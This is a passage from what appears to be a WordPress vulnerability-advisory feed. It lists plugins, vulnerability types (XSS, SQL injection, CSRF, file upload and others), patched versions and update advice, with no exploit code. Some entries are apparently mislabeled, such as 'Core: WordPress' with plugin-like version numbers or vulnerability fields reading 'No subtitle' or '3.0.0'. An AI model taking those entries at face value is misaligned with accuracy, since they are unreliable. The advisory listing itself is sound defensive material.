Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Login with phone number

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: masterslider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.6.3
Recommended Action: Update to version 8.6.3, or a newer patched version

Plugin: Star CloudPRNT for WooCommerce

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Metabox

Vulnerability: Cross-Site Request Forgery via gallery_remove
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mobile Domain

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP All Import Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: SQL Injection
Patched Version: 3.2.7.3
Recommended Action: Update to version 3.2.7.3, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 12.6.7
Recommended Action: Update to version 12.6.7, or a newer patched version

Plugin: WP Job Board

Vulnerability: Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.6.01
Recommended Action: Update to version 2.6.01, or a newer patched version

Plugin: Forget About Shortcode Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Cooked Pro

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.7.5.7
Recommended Action: Update to version 1.7.5.7, or a newer patched version

Plugin: TextMe SMS

Vulnerability: Missing Authorization via tetxme_update_option_page()
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Sign In Scheduling Online Appointment Booking System

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My Content Management

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Browser Screenshots

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: WP Not Login Hide (WPNLH)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Cross-Site Request Forgery to Effect Deletion
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Missing Authorization
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Core: WordPress

Vulnerability: All Known Versions
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: PHP Object Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: No subtitle
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Meet My Team

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.31
Recommended Action: Update to version 1.8.31, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Perfect Brands for WooCommerce

Vulnerability: Server Information Disclosure
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Easy Form Builder – WordPress plugin form builder: contact form, survey form, payment form, and custom form builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: xPinner Lite

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Email Injection
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: ActiveCampaign for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Multiple Authenticated (Editor+) SQL Injection
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: Insert Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: HTML5 jQuery Audio Player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: AMP Toolbox

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress project source code download

Vulnerability: Unauthenticated Backup Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Missing Authorization to Test Email
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Headline Analyzer

Vulnerability: Missing Authorization via REST APIs
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Loginizer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.18
Recommended Action: Update to version 2.8.18, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: WebwinkelKeur: Webshop keurmerk & reviews for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.25
Recommended Action: Update to version 3.25, or a newer patched version

Plugin: Tag Miner (Automatic Tag Extraction)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Security Token Bypass via Type Juggling
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: Ad Injection

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP User – Custom Registration Forms, Login and User Profile

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Responsive Column Widgets

Vulnerability: Open Redirect via responsive_column_widgets_link
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Custom Fields Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Smartkit

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Membership SwiftCloud.io

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yellow Yard Searchbar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.12
Recommended Action: Update to version 2.8.12, or a newer patched version

Plugin: IDB Ecommerce (wpStoreCart 5)

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.30
Recommended Action: Update to version 2.5.30, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Admin+ SQL Injection
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Open Redirect
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.4.38.727
Recommended Action: Update to version 7.4.38.727, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Sensitive Data Exposure of Multifactor Backup Codes
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 7.6.1.0
Recommended Action: Update to version 7.6.1.0, or a newer patched version

Plugin: Orders Tracking for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Highcompress Image Compressor

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Secure Admin IP

Vulnerability: Missing Authorization via ‘saveSettings’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 1.8.15
Recommended Action: Update to version 1.8.15, or a newer patched version

Plugin: S3 Bubble Amazon S3 HTML5 Video with Adverts

Vulnerability: Directory Traversal to Arbitrary File Access
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: WP Travel Engine – Tour Booking Plugin – Tour Operator Software

Vulnerability: Editor+ Stored Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WordPress OpenID Connect Client

Vulnerability: Authentication Bypass
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WPify Woo Czech

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: Mobile Call Now & Map Buttons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mediamatic – Media Library Folders

Vulnerability: SQL Injection
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: ImageMapper

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change via ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Footer Text

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WP Symposium

Vulnerability: Authenticated SQL Injection
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.7
Recommended Action: Update to version 5.4.7, or a newer patched version

Plugin: Simple Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Administrator+) Arbitrary File Read and Deletion in gallery_edit
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: FlatPM – Ad Manager, AdSense and Custom Code

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.662
Recommended Action: Update to version 2.662, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.12
Recommended Action: Update to version 3.12, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Denial of Service
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Authenticated Arbitrary File Upload in Template Editing
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_pause_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Conditional Fields for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Flo Forms – Easy Drag & Drop Form Builder

Vulnerability: Options Change to Stored Cross-Site Scripting
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Checkout Field Editor (Checkout Manager) for WooCommerce

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WTI Like Post

Vulnerability: SQL Injection
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: jQuery Reply to Comment

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.22
Recommended Action: Update to version 1.8.22, or a newer patched version

Plugin: Smart YouTube PRO

Vulnerability: Cross-Site Request Forgery via handle_colorbox_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Akismet Privacy Policies

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fattura24

Vulnerability: Reflected Cross-Site Scripting via ‘id’
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Leyka

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.30
Recommended Action: Update to version 3.30, or a newer patched version

Plugin: sexybookmarks

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.1.5.0
Recommended Action: Update to version 6.1.5.0, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Information Disclosure
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Floating Menu – One page navigator, sticky menu for WordPress

Vulnerability: Cross-Site Scripting via id Parameter
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Admin Font Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Sensitive Post Content Exposure
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: 3.0.0
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Onepage Builder – Easiest Landing Page Builder For WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_expired_used_coupon_code
Patched Version: 5.14.2
Recommended Action: Update to version 5.14.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Information Disclosure via Back-Up Files
Patched Version: 4.4.1.2
Recommended Action: Update to version 4.4.1.2, or a newer patched version

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Taxonomy Import

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Article Directory

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘publish_terms_text’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Htaccess by BestWebSoft – WordPress Website Access Control Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Woopra Analytics Plugin

Vulnerability: Remote Code Execution
Patched Version: 1.4.3.2
Recommended Action: Update to version 1.4.3.2, or a newer patched version

Plugin: Extra User Details

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Eshop Magic

Vulnerability: Arbitrary File Read
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: RSS for Yandex Turbo

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: No subtitle
Patched Version: 6.24.2
Recommended Action: Update to version 6.24.2, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CommonsBooking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Cross-Site Request Forgery to Data Modification
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WooCommerce Brands

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.50
Recommended Action: Update to version 1.6.50, or a newer patched version

Plugin: Images to WebP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Sticky Social

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Font Awesome Integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.4.6
Recommended Action: Update to version 7.4.6, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: GDPR CCPA Compliance & Cookie Consent Banner

Vulnerability: PHP Object Injection
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: amtyThumb posts

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W3 Total Cache

Vulnerability: Information Exposure
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Clipta Video Informer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Authenticated (Administrator+) Arbitrary File Access via Path Traversal
Patched Version: 1.7.5.5
Recommended Action: Update to version 1.7.5.5, or a newer patched version

Plugin: WPB Advanced FAQ

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donation Button

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Factory Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress WP-Advanced-Search

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Updates
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Discounts Manager for Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Authenticated (Subscriber+) PHP Code Injection
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_ajax_delete_payment_note
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.33
Recommended Action: Update to version 2.0.33, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Chamber Dashboard Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WishSuite – Wishlist for WooCommerce

Vulnerability: Cross-Site Request Forgery via plugin_activation()
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Monsters Editor for WP Super Edit

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ravpage

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.18
Recommended Action: Update to version 2.18, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Arbitrary File Upload
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: Encrypted Blog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.0.6.6
Recommended Action: Update to version 0.0.6.6, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
